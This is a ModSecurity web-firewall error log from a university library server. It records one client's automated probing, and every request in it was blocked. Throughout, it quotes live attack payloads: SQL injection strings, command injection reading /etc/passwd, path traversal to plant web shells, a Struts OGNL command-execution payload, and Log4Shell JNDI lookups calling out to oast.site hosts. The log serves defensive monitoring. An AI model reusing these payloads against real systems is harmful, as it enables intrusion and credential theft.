[Tue Aug 29 11:32:12.363262 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQV4UMAAAA3"]
[Tue Aug 29 11:32:13.316476 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAP5mPsAAAAM"]
[Tue Aug 29 11:32:13.331476 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmky4pratjkk8x.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmky4pratjkk8x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAPDoC0AAAAP"]
[Tue Aug 29 11:32:15.338929 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQV4U4AAAA3"]
[Tue Aug 29 11:32:15.397181 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAP5mQcAAAAM"]
[Tue Aug 29 11:32:15.414578 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQ83RgAAAAI"]
[Tue Aug 29 11:32:15.414612 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQ83RgAAAAI"]
[Tue Aug 29 11:32:16.307094 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQV4VIAAAA3"]
[Tue Aug 29 11:32:17.307592 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAQMr1wAAAAu"]
[Tue Aug 29 11:32:18.345034 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAANwNxkAAAAb"]
[Tue Aug 29 11:32:18.374408 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUID0AAAA2"]
[Tue Aug 29 11:32:21.307085 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQ9H18AAAAK"]
[Tue Aug 29 11:32:21.422471 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQ9H2QAAAAK"]
[Tue Aug 29 11:32:22.560181 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQ83T0AAAAI"]
[Tue Aug 29 11:32:23.334907 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANWgaMAAAAG"]
[Tue Aug 29 11:32:23.354905 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAANWgaQAAAAG"]
[Tue Aug 29 11:32:25.337547 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPxBYcAAAAS"]
[Tue Aug 29 11:32:25.343465 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAPiBrwAAAAB"]
[Tue Aug 29 11:32:27.483815 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARGwcMAAAAL"]
[Tue Aug 29 11:32:28.353017 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAPDoGcAAAAP"]
[Tue Aug 29 11:32:30.299308 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAAPDoG8AAAAP"]
[Tue Aug 29 11:32:31.307542 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARIwIoAAAAO"]
[Tue Aug 29 11:32:32.371902 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAARMMb0AAAAR"]
[Tue Aug 29 11:32:32.391085 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQ83VEAAAAI"]
[Tue Aug 29 11:32:32.391151 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAAQ83VEAAAAI"]
[Tue Aug 29 11:32:35.360327 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgtuz8sab9xepj1.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgtuz8sab9xepj1.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg4166jnokhq88o.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARLXvQAAAAQ"]
[Tue Aug 29 11:32:36.367908 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARD1O4AAAAH"]
[Tue Aug 29 11:32:37.427994 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAARMMcMAAAAR"]
[Tue Aug 29 11:32:38.405285 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARA7acAAAAA"]
[Tue Aug 29 11:32:38.426388 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARMMc8AAAAR"]
[Tue Aug 29 11:32:40.413099 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgmb66r78e433iq.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARIwKIAAAAO"]
[Tue Aug 29 11:32:42.511539 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAN9sYEAAAAJ"]
[Tue Aug 29 11:32:46.426458 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAAN9sYcAAAAJ"]
[Tue Aug 29 11:32:47.564916 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAAQOv-oAAAAw"]
